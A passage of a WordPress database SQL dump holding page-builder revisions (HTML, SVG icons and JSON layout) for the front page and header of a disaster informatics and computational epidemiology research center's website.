class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c16\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c20\">\n <!---->\n <!---->\n <h5 class=\"\">Impact assessment</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-04-29 09:17:36','2022-04-29 13:17:36','',20,'https://gsudice.dataconn.net/?p=1295',0,'revision','',0),(1296,1,'2022-04-29 09:17:36','2022-04-29 13:17:36','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/our-mission\\/\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h29\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h31\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h33\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h37\",\"parentId\":\"22-h36\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h38\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-04-29 09:17:36','2022-04-29 13:17:36','',23,'https://gsudice.dataconn.net/?p=1296',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1297,1,'2022-04-29 09:17:36','2022-04-29 13:17:36','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path 